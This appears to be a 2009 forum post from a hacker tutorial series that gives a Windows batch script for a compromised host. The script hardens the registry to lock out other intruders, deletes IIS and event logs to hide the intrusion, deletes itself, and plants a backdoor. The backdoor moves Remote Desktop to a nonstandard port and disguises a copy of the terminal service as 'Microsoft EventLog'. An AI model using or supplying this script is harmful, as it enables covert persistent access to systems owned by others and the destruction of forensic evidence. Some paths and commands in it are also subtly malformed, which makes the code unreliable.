Hacker Tutorial Series - A Concise Guide to Batch Files (18-19)

Posted 2009-11-23 00:16:56 | IP: Yangzhou, Jiangsu
2. Batch file that fully hardens the system (patches the compromised host)
  ------------------------ cut here then save as .bat or .cmd file ---------------------------
  @echo Windows Registry Editor Version 5.00 >patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
  @echo "AutoShareServer"=dword:00000000 >>patch.dll
  @echo "AutoShareWks"=dword:00000000 >>patch.dll
  @REM [Disable default shares]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
  @echo "restrictanonymous"=dword:00000001 >>patch.dll
  @REM [Disable anonymous logon]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
  @echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
  @REM [Disable file access and print sharing]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >>patch.dll
  @echo "Start"=dword:00000004 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
  @echo "Start"=dword:00000004 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
  @echo "ShutdownWithoutLogon"="0" >>patch.dll
  @REM [Disable shutdown before logon]
  @echo "DontDisplayLastUserName"="1" >>patch.dll
  @REM [Do not display the last logged-on user name]
  @regedit /s patch.dll
 ------------------------ cut here then save as .bat or .cmd file ---------------------------
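  The following commands clear all logs on the compromised host, disable some dangerous services, and modify the host's terminal service to leave a way back in.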
  @regedit /s patch.dll
  @net stop w3svc
  @net stop event log
  @del c:\winnt\system32\logfiles\w3svc1\*.* /f /q
  @del c:\winnt\system32\logfiles\w3svc2\*.* /f /q
  @del c:\winnt\system32\config\*.event /f /q
  @del c:\winnt\system32dtclog\*.* /f /q
  @del c:\winnt\*.txt /f /q
  @del c:\winnt\*.log /f /q
  @net start w3svc
  @net start event log
  @rem [Delete logs]
  @net stop lanmanserver /y
  @net stop Schedule /y
  @net stop RemoteRegistry /y
  @del patch.dll
  @echo The server has been patched,Have fun.
  @del patch.bat
  @REM [Disable some dangerous services.]
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>patch.dll
  @echo "PortNumber"=dword:00002010 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp >>patch.dll
  @echo "PortNumber"=dword:00002012 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>patch.dll
  @echo "Start"=dword:00000002 >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService] >>patch.dll
  @echo "Start"=dword:00000002 >>patch.dll
  @echo "ErrorControl"=dword:00000001 >>patch.dll
  @echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\ >>patch.dll
  @echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\ >>patch.dll
  @echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
  @echo "ObjectName"="LocalSystem" >>patch.dll
  @echo "Type"=dword:00000010 >>patch.dll
  @echo "Description"="Keep record of the program and windows message。" >>patch.dll
  @echo "DisplayName"="Microsoft EventLog" >>patch.dll
  @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice] >>patch.dll
  @echo "Start"=dword:00000004 >>patch.dll
  @copy c:\winnt\system32\termsrv.exe c:\winnt\system32\eventlog.exe
  @REM [Change the 3389 connection: port 8210 (hexadecimal 00002012), name Microsoft EventLog, leaving a way back in]